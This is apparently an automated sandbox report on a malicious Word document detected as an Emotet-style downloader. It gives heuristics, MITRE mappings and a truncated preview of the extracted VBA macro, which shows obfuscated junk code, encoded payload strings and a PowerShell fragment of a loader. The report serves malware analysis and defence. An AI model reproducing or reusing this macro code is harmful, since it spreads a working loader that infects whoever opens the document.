Verdict: MALICIOUS (Risk Score 224)

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1204.002 Malicious File
The file is identified as malicious by ClamAV and contains a VBA macro with an AutoOpen function (an auto-execution entry point). The macro calls CreateObject, a common technique for executing code outside the document. The script is obfuscated, and the heuristic firings together with the presence of the VBA macro indicate that it is designed to download and execute a second-stage payload.
Heuristics (8)

- ClamAV: Doc.Malware.Emodldr-10025032-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Malware.Emodldr-10025032-0
- VBA macros detected (medium, OLE_VBA_MACROS, 3 related findings): Document contains VBA macro code
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- CreateObject call (high, OLE_VBA_CREATEOBJ): CreateObject call
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Suspicious extracted artifact (info, EXTRACTED_FILE_STATIC_TRIAGE): One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 45100 bytes |

SHA-256: 5785f046925abd60b025e691ab3c2e934145f74ce0f9d57c33c380420131bbcf

Detection:
- ClamAV: No threats found
- Obfuscation or payload: likely (carved artifact contains 27 long base64-like blob(s))
Preview script: first 1,000 lines of the extracted script

```vba
Attribute VB_Name = "jqRmnGCwQdiuKj"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "dSObSWYrjYfim"
Function IGOsjbjN()
On Error Resume Next
Select Case izPUVZ
Case 90923
WbTnMb = Hex(43348 - CSng(95424) - 84299 + ChrW(hYEJrD))
aisHW = jaqjd
End Select
hUqYAOz = ijpHj("BaQA0ADUAZABiADMAZQBmAGQANwBhADgAYQBiADEAYgBiAGYAZAA3ADIAYwA2ADMAZQA2ADAAMAA3AGQAMgA3AGIAMAA0ADkAYQBhAGQAOABiADQAMABkADkAMwAyADMAOQAyAGEANABlADcAZgBkADICZS7k0r", 3, 150)
Select Case jGCamL
Case 4202
GEwiF = Hex(55431 - CSng(98602) - 21384 + ChrW(XYHMKv))
CizPmN = usPIW
End Select
Select Case krkXF
Case 69465
YiSOw = Hex(69889 - CSng(34674) - 15046 + ChrW(rnOlw))
oLVjTa = qESmR
End Select
ZjPivH = ijpHj("nZ6HcJ51Ml", 2, 1)
Select Case joqhSZ
Case 72190
INPpR = Hex(65533 - CSng(89597) - 41194 + ChrW(pVVzDZ))
YRdJo = wJSrb
End Select
Select Case JGnucm
Case 21025
BrwOAK = Hex(15142 - CSng(29570) - 17892 + ChrW(wraHlv))
LnwsSf = iiFsUQ
End Select
TShkNhrdM = ijpHj("sQAGIAZQA0ADIAZgAwAGYAMQA3ADcAMAAxAGQAMwA5ADYAOAA5ADQAMwA4AGYAYQA2AGEAMgA1ADcAMABlADAAZAAxADkANQA1ADgAZgBiADQAZgAwAGEAOQAxADYANwBlADAAYQA1ADgAZQA1ADkAZABhADcANQAyAGIAZgAxAGIAM3q2T", 3, 173)
Select Case IFwJu
Case 63861
URihrf = Hex(71485 - CSng(33073) - 24220 + ChrW(UrAQw))
viLQf = EPvsX
End Select
Select Case zYdhCQ
Case 36975
wsGMX = Hex(38810 - CSng(44693) - 76845 + ChrW(nEiVf))
kTlNfT = cHCzS
End Select
WOYjSwtP = ijpHj("3nB%EA4AGUAMAA5ADYAMgAyADIANwA5ADIANgAwADIAMAAyADIANwBjAGQAMwBmADMANQBiADUA' |cONvertTo-secuRESTrINg -K (165..150)) ) ) ) | &( $PshOmE[bTMW", 6, 130)
Select Case rzpND
Case 72634
JiwiDE = Hex(7307 - CSng(80919) - 97469 + ChrW(QYTisN))
DnCjQ = KZBUwN
End Select
Select Case FGKOKA
Case 69822
AaIVo = Hex(41290 - CSng(26083) - 44341 + ChrW(VmWdN))
rXOqh = jQSMEM
End Select
bvVEiUo = ijpHj("%i7BiADIAMwAzADYAMwBjAGMANgAzAGIAYwA2AGYAYwA3AGIAYQA1ADgAOQBiAGEAMAAzADMAMwAyAGIAZgAwAGMAOQBkADcAMQAzADkANgBmADEAZAA0ADMAYwA2ADgAOQBjADYAMQAzADgAMwA0ADIANAA0AGYANQA2ADcAYwA3ADAAMwA4ADUiF2", 4, 181)
Select Case IXiHGz
Case 92280
ZfwqF = Hex(72998 - CSng(80290) - 75695 + ChrW(jSrwSq))
JCUTKq = jIfOi
End Select
Select Case OzLjrQ
Case 88299
zGAQDp = Hex(69531 - CSng(46167) - 32065 + ChrW(YsXltD))
Owswi = pukjq
End Select
EbbTP = ijpHj("ttquYAyAGIAYQBmAGEAYwBmAGYANQBlADcAYQA1ADAANwBiADcAYwBjADAAZQBjADYAMgA1ADgANwBiADcANwA4AGEAOAAwAGQAZgBlADUAMAA1ADAANQA0ADAAMz7", 6, 119)
Select Case DioYX
Case 62293
daMILZ = Hex(47829 - CSng(10510) - 73328 + ChrW(EcFHUd))
BjQmK = SFtTN
End Select
Select Case bsBbK
Case 37802
jHEHk = Hex(64420 - CSng(24248) - 75614 + ChrW(rhQYBR))
FwHRFz = NPFdU
End Select
DDnaiV = ijpHj("PW8AGsAbgBsAFoANwA4ADAAQwA3AGsAYwBUAHcANgBEAEUAcwB0AFQATwB4AHcAPQA9AHwAYQA3X92o", 3, 72)
Select Case vkiFw
Case 96017
iHiQt = Hex(27181 - CSng(88740) - 70378 + ChrW(drwJB))
fCCFlz = sfDsQi
End Select
Select Case TwkSc
Case 3374
QXbifL = Hex(17297 - CSng(62726) - 77708 + ChrW(BdcZI))
DfbPui = UqcUm
End Select
fFanMtKF = ijpHj("fcAYwA0ADIAMABlAGQAMABjAGEAZgBjADkANQBjADIAMwAxADIANAA0AGMANAAwAGMAZQAwAGYAMgBlADkAZgBlADIAYgAzADYANABjADEAZgAwAGEAYQBjADgANAA5ADYAYgA1ADkANwBmA2wrk8", 3, 142)
Select Case oOTjJ
Case 20694
KMhFZl = Hex(78971 - CSng(2640) - 85358 + ChrW(TlLVj))
BlzhOH = DqWMzF
End Select
Select Case vTnmzY
Case 79943
XNiGH = Hex(22112 - CSng(96142)
... (truncated)
```